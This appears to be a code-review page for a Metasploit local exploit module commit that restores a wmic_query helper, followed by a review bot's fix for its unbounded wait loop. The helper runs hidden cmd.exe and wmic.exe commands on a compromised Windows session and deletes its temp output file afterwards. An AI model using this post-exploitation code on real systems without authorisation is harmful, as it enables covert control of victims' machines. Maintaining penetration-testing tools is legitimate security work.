Fix #4558 by restoring the old wmicexec
parent
2d0a26ea8b
commit
bf6975c01a
@ -194,4 +194,51 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
print_status("Cleanup Meterpreter RC File: #{clean_rc}")
|
||||
end
|
||||
|
||||
#
|
||||
# Execute a WMIC command
|
||||
#
|
||||
def wmic_query(wmic_cmd)
|
||||
tmp_out = ''
|
||||
old_timeout = session.response_timeout
|
||||
session.response_timeout = 120
|
||||
begin
|
||||
tmp = expand_path('%TEMP%')
|
||||
wmi_cfl = tmp + "\\" + sprintf('%.5d', rand(100000))
|
||||
r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmi_cfl} #{wmic_cmd}", nil, {'Hidden' => true})
|
||||
Rex.sleep(2)
|
||||
|
||||
# Making sure that wmic finishes before executing next wmic command
|
||||
found = 0
|
||||
while found == 0
|
||||
session.sys.process.get_processes.each do |x|
|
||||
found =1
|
||||
if 'wmic.exe' == x['name'].downcase
|
||||
Rex.sleep(0.5)
|
||||
found = 0
|
||||
end
|
||||
end
|
||||
end
|
||||
r.close
|
||||
|
||||
# Give the process time to flush the output
|
||||
Rex.sleep(2)
|
||||
|
||||
# Read the output file of the wmic commands
|
||||
wmi_out_file = session.fs.file.new(wmi_cfl, 'rb')
|
||||
until wmi_out_file.eof?
|
||||
tmp_out << wmi_out_file.read
|
||||
end
|
||||
wmi_out_file.close
|
||||
rescue ::Exception => e
|
||||
print_error("Error running WMIC commands: #{e.class} #{e}")
|
||||
end
|
||||
# We delete the file with the wmic command output.
|
||||
c = session.sys.process.execute("cmd.exe /c del #{wmi_cfl}", nil, {'Hidden' => true})
|
||||
c.close
|
||||
tmp_out.gsub!(/[^[:print:]]/,'') #scrub out garbage
|
||||
|
||||
session.response_timeout = old_timeout
|
||||
tmp_out
|
||||
end
|
||||
|
||||
end
|
||||
|
|
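Review bot: The wait loop at `found = 0` / `while found == 0` has no upper bound and keys on the wrong signal: it treats any process named wmic.exe as "ours", and if `get_processes` ever returns an empty list `found` stays 0 and the loop spins forever, so a stuck or unrelated wmic.exe on the host stalls the module indefinitely. Waiting on the pid of the process this call launched (`r.pid`) with a deadline fixes both; a sketch follows (the 60 s limit is an arbitrary value to tune). Separately, `rescue ::Exception => e` also swallows `Interrupt` and `SystemExit`, so a hung query cannot be aborted cleanly — `rescue ::StandardError` is the narrower choice — and moving `session.response_timeout = old_timeout` into an `ensure` guarantees the session timeout is restored even if the later `del` step raises. `wmic_query` and the class's closing `end` are both inside the hunk; the class header is not.
```ruby
r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmi_cfl} #{wmic_cmd}", nil, {'Hidden' => true})
# Wait for the wmic process we started (matched by pid, not by name), with an
# upper bound so a hung wmic.exe cannot stall the module forever.
deadline = Time.now + 60
loop do
  still_running = session.sys.process.get_processes.any? { |p| p['pid'] == r.pid }
  break unless still_running
  if Time.now > deadline
    print_error("wmic.exe (pid #{r.pid}) did not finish within 60s")
    break
  end
  Rex.sleep(0.5)
end
r.close
# … unchanged: output file read, cleanup of wmi_cfl, timeout restore …
```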